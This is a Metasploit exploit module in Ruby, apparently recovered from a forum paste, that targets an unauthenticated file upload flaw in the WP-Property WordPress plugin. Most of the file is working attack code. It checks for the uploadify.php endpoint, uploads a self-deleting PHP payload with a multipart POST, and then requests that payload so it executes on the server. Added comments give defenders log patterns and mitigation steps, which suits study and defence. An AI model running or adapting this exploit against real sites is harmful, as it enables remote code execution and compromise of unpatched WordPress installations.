##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

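# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description).
#
# The listing was recovered from a forum paste that had filler characters
# interleaved with the code; the filler is removed here and the mixin name
# that the forum rendered as "Msf::Exploit:hpEXE" is restored to
# Msf::Exploit::PhpEXE.
#
# Notes for defenders, derived from the requests this module sends:
# * The vulnerable endpoint is
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   and it is reached without any authentication.
# * In web server logs the pattern is a multipart POST to that path followed
#   by a GET for a .php file whose location the POST response returned.
# * Mitigation: update the plugin to a release later than 1.35.0 (confirm the
#   fixed version against the vendor advisory), remove or block direct access
#   to uploadify.php, and deny script execution in upload directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets) and the
  # TARGETURI option that points at the WordPress installation.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the plugin's uploadify.php endpoint.
  #
  # The result is based only on the HTTP status of a GET request. The plugin
  # version is never read, so a patched or access-restricted script that
  # still answers 200 is also reported as Appears.
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or the status is not 200
  # @return [Exploit::CheckCode::Appears] when the endpoint answers with status 200
  def check
    uri = target_uri.path
    # Build a new string instead of appending in place, so the object
    # returned by target_uri.path is never mutated.
    uri = "#{uri}/" unless uri.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown if !res || res.code != 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests it.
  #
  # The upload is a two-part multipart/form-data POST: "Filedata" carries the
  # file and "folder" names the destination directory. The module expects the
  # response body to contain the stored file name and uses that body as the
  # URI of the follow-up GET.
  #
  # @return [Object] the result of the final send_request_raw call
  def exploit
    uri = target_uri.path
    # Non-mutating form of the trailing-slash normalisation (see #check).
    uri = "#{uri}/" unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self presumably makes the generated stub delete
    # itself once it has run, so the uploaded file may not stay on disk;
    # incident responders should rely on request logs, not file presence.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops a CRLF that sits at the start of a line directly before a
    # "--_Part_" boundary marker in the serialised message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # A literal substring test replaces the interpolated regex, in which the
    # "." of ".php" matched any character. to_s guards against a nil body.
    if !res || res.code != 200 || !res.body.to_s.include?(@payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

# Original poster's note (translated): do not ask me what this is or how to
# use it; I mean msf.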